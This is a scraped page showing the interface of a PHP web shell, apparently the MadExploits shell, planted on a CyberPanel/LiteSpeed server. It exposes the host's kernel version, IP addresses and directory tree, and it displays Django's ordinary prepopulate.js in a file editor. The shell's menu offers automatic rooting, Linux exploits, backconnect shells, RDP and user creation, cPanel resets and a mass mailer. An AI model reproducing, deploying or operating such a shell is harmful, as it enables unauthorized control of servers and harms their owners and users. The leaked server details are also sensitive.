Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
public /
static /
admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
SelectBox.js
4.42
KB
-rw-r--r--
SelectFilter2.js
14.93
KB
-rw-r--r--
actions.js
7.69
KB
-rw-r--r--
autocomplete.js
1.04
KB
-rw-r--r--
calendar.js
8.27
KB
-rw-r--r--
cancel.js
884
B
-rw-r--r--
change_form.js
606
B
-rw-r--r--
collapse.js
1.76
KB
-rw-r--r--
core.js
5.55
KB
-rw-r--r--
filters.js
978
B
-rw-r--r--
inlines.js
15.16
KB
-rw-r--r--
jquery.init.js
347
B
-rw-r--r--
nav_sidebar.js
2.99
KB
-rw-r--r--
popup_response.js
551
B
-rw-r--r--
prepopulate.js
1.5
KB
-rw-r--r--
prepopulate_init.js
586
B
-rw-r--r--
theme.js
1.9
KB
-rw-r--r--
urlify.js
7.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : prepopulate.js
/*global URLify*/ 'use strict'; { const $ = django.jQuery; $.fn.prepopulate = function(dependencies, maxLength, allowUnicode) { /* Depends on urlify.js Populates a selected field with the values of the dependent fields, URLifies and shortens the string. dependencies - array of dependent fields ids maxLength - maximum length of the URLify'd string allowUnicode - Unicode support of the URLify'd string */ return this.each(function() { const prepopulatedField = $(this); const populate = function() { // Bail if the field's value has been changed by the user if (prepopulatedField.data('_changed')) { return; } const values = []; $.each(dependencies, function(i, field) { field = $(field); if (field.val().length > 0) { values.push(field.val()); } }); prepopulatedField.val(URLify(values.join(' '), maxLength, allowUnicode)); }; prepopulatedField.data('_changed', false); prepopulatedField.on('change', function() { prepopulatedField.data('_changed', true); }); if (!prepopulatedField.val()) { $(dependencies.join(',')).on('keyup change focus', populate); } }); }; }
Close